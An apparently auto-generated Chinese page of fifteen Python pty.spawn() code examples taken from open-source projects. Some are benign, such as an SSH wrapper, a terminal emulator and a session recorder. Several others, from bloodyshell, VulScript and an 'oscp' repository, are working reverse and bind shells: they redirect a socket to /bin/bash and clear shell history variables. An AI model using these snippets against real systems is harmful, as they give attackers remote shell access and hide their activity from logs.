Python pty 模块,spawn() 实例源码

我们从Python开源项目中,提取了以下15个代码示例,用于说明如何使用pty.spawn()

项目:ceph-lcm    作者:Mirantis    | 项目源码 | 文件源码
def connect(srv_model, ctx):
    ssh_command = shutil.which("ssh")
    if not ssh_command:
        raise ValueError("Cannot find ssh command")

    ssh_command = [ssh_command]
    ssh_command.append("-4")
    ssh_command.append("-tt")
    ssh_command.append("-x")
    ssh_command.extend(("-o", "UserKnownHostsFile=/dev/null"))
    ssh_command.extend(("-o", "StrictHostKeyChecking=no"))
    ssh_command.extend(("-l", srv_model.username))
    ssh_command.extend(("-i", ctx.obj["identity_file"]))
    ssh_command.extend(ctx.obj["ssh_args"])
    ssh_command.append(srv_model.ip)

    LOG.debug("Execute %s", ssh_command)

    pty.spawn(ssh_command)
项目:remote-docker    作者:phizaz    | 项目源码 | 文件源码
def spawn(self, argv):
        '''
        Create a spawned process.
        Based on the code for pty.spawn().
        '''
        assert self.master_fd is None
        assert isinstance(argv, list)

        pid, master_fd = pty.fork()
        self.master_fd = master_fd

        if pid == pty.CHILD:
            os.execlp(argv[0], *argv)  # and not ever returned

        self._init()
        try:
            self._copy()  # start communication
        except Exception:
            # unexpected errors
            self._del()
            raise
        self._del()

        return self.log.decode()
项目:fenrir    作者:chrys87    | 项目源码 | 文件源码
def startEmulator(self):
        pty.spawn(self.shell, self.outputCallback, self.inputCallback)
项目:fenrir    作者:chrys87    | 项目源码 | 文件源码
def startEmulator(self):
        pty.spawn(self.shell, self.outputCallback, self.inputCallback)
项目:bloodyshell    作者:deadPix3l    | 项目源码 | 文件源码
def ptyShell(action, sock):
    # #platformshells = {
    #     'win': 'cmd.exe',
    #     'mac': '/bin/bash',
    #     'nix': '/bin/bash',
    #     'unk': ''
    # }
    # shellExe = platformshells[plat]
    shellExe = '/bin/bash'

    #preparing
    oldin = os.dup(0)
    oldout = os.dup(1)
    olderr = os.dup(2)
    os.dup2(sock.fileno(),0)
    os.dup2(sock.fileno(),1)
    os.dup2(sock.fileno(),2)
    #os.putenv("HISTFILE",'/dev/null')

    #Shellz!
    pty.spawn(shellExe)

    # cleanup
    os.dup2(oldin,0)
    os.dup2(oldout,1)
    os.dup2(olderr,2)
项目:dataplicity-agent    作者:wildfoundry    | 项目源码 | 文件源码
def spawn(self, argv=None):
        '''
        Create a spawned process.
        Based on the code for pty.spawn().
        '''
        assert self.master_fd is None

        pid, master_fd = pty.fork()
        self.master_fd = master_fd
        self.pid = pid
        if pid == pty.CHILD:
            if self.user is not None:
                try:
                    uid = pwd.getpwnam(self.user).pw_uid
                except KeyError:
                    log.error("No such user: %s", self.user)
                else:
                    os.setuid(uid)
                    log.debug('switched user for remote process to %s(%s)', self.user, uid)
            if self.group is not None:
                try:
                    gid = grp.getgrnam(self.group).gr_gid
                except KeyError:
                    log.error("No such group: %s", self.group)
                else:
                    os.setgid(gid)
                    log.debug('switched group for remote process to %s(%s)', self.group, gid)
            if not argv:
                argv = [os.environ['SHELL']]
            os.execlp(argv[0], *argv)
            # Previous command replaces the process
            return

        self._init_fd()
        try:
            self._copy()
        except (IOError, OSError):
            pass

        os.close(master_fd)
        self.master_fd = None
项目:ceph-lcm    作者:Mirantis    | 项目源码 | 文件源码
def mongolock_cli():
    @configure
    def main():
        parser = argparse.ArgumentParser(
            description="Run program, acquiring the lock in MongoDB"
        )
        parser.add_argument(
            "-l", "--lockname",
            help="Name of the lock",
            required=True
        )
        parser.add_argument(
            "-b", "--block",
            help="Block execution till lock will be available",
            action="store_true",
            default=False
        )
        parser.add_argument(
            "-t", "--timeout",
            help="Timeout for blocking",
            type=int,
            default=None
        )
        parser.add_argument(
            "command",
            help="Command to run",
            nargs=argparse.ONE_OR_MORE,
        )
        options = parser.parse_args()

        locked = lock.with_autoprolong_lock(
            options.lockname,
            block=options.block, timeout=options.timeout)

        with locked:
            pty.spawn(options.command)

    return main()
项目:VulScript    作者:y1ng1996    | 项目源码 | 文件源码
def main():
    if len(sys.argv) !=3:
        usage(sys.argv[0])
        sys.exit()
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    try:
        s.connect((sys.argv[1],int(sys.argv[2])))
        print 'connect ok'
    except:
        print 'connect faild'
        sys.exit()
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    global shell
    os.unsetenv("HISTFILE")
    os.unsetenv("HISTFILESIZE")
    os.unsetenv("HISTSIZE")
    os.unsetenv("HISTORY")
    os.unsetenv("HISTSAVE")
    os.unsetenv("HISTZONE")
    os.unsetenv("HISTLOG")
    os.unsetenv("HISTCMD")
    os.putenv("HISTFILE",'/dev/null')
    os.putenv("HISTSIZE",'0')
    os.putenv("HISTFILESIZE",'0')
    pty.spawn(shell)
    s.close()
项目:gitsome    作者:donnemartin    | 项目源码 | 文件源码
def _delay_for_pipe(self, env=None, delay=None):
        # This delay is sometimes needed because the temporary stdin file that 
        # is being written (the pipe) may not have even hits its first flush()
        # call by the time the spawned process starts up and determines there 
        # is nothing in the file. The spawn can thus exit, without doing any
        # real work.  Consider the case of piping something into grep:
        #
        #   $ ps aux | grep root
        #
        # grep will exit on EOF and so there is a race between the buffersize 
        # and flushing the temporary file and grep.  However, this race is not
        # always meaningful. Pagers, for example, update when the file is written
        # to. So what is important is that we start the spawned process ASAP:
        #
        #   $ ps aux | less
        #
        # So there is a push-and-pull between the the competing objectives of
        # not blocking and letting the spawned process have enough to work with
        # such that it doesn't exit prematurely.  Unfortunately, there is no
        # way to know a priori how big the file is, how long the spawned process
        # will run for, etc. Thus as user-definable delay let's the user 
        # find something that works for them.
        if delay is None:
            delay = (env or os.environ).get('TEEPTY_PIPE_DELAY', -1.0)
        delay = float(delay)
        if 0.0 < delay:
            time.sleep(delay)
项目:cs251-toolkit    作者:StoDevX    | 项目源码 | 文件源码
def run_interactive(cmd):
    status = 'success'
    result = None

    print('Recording {}. Send EOF (^D) to end.'.format(cmd), end='\n\n')

    # This is mostly taken from the stdlib's `pty` docs
    with io.BytesIO() as script:
        def read(fd):
            data = os.read(fd, 1024)
            script.write(data)
            return data

        # TODO: update this with try/except clauses as we find exceptions
        pty.spawn(cmd, read)

        try:
            result = script.getvalue().decode(encoding='utf-8')
        except UnicodeDecodeError:
            result = script.getvalue().decode(encoding='cp437')

    print('\nSubmission recording completed.')

    runagain = input('Do you want to run the submission again? [y/N]: ')
    again = runagain.lower().startswith('y')

    return (status, result, again)
项目:oscp    作者:ckt29175    | 项目源码 | 文件源码
def main():
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.bind(('', lport))
    s.listen(1)
    (rem, addr) = s.accept()
    os.dup2(rem.fileno(),0)
    os.dup2(rem.fileno(),1)
    os.dup2(rem.fileno(),2)
    os.putenv("HISTFILE",'/dev/null')
    pty.spawn("/bin/bash")
    s.close()
项目:oscp    作者:ckt29175    | 项目源码 | 文件源码
def main():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((lhost, lport))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    os.putenv("HISTFILE",'/dev/null')
    pty.spawn("/bin/bash")
    s.close()
项目:oscp    作者:ckt29175    | 项目源码 | 文件源码
def main():
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.connect((lhost, lport))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    os.putenv("HISTFILE",'/dev/null')
    pty.spawn("/bin/bash")
    s.close()
项目:oscp    作者:ckt29175    | 项目源码 | 文件源码
def main():
    s = sctpsocket_tcp(socket.AF_INET)
    s.connect((lhost, lport))
    os.dup2(s.fileno(),0)
    os.dup2(s.fileno(),1)
    os.dup2(s.fileno(),2)
    os.putenv("HISTFILE",'/dev/null')
    pty.spawn("/bin/bash")
    s.close()
项目:oscp    作者:ckt29175    | 项目源码 | 文件源码
def main():
    s = sctpsocket_tcp(socket.AF_INET)
    s.bind(('', lport))
    s.listen(1)
    (rem, addr) = s.accept()
    os.dup2(rem.fileno(),0)
    os.dup2(rem.fileno(),1)
    os.dup2(rem.fileno(),2)
    os.putenv("HISTFILE",'/dev/null')
    pty.spawn("/bin/bash")
    s.close()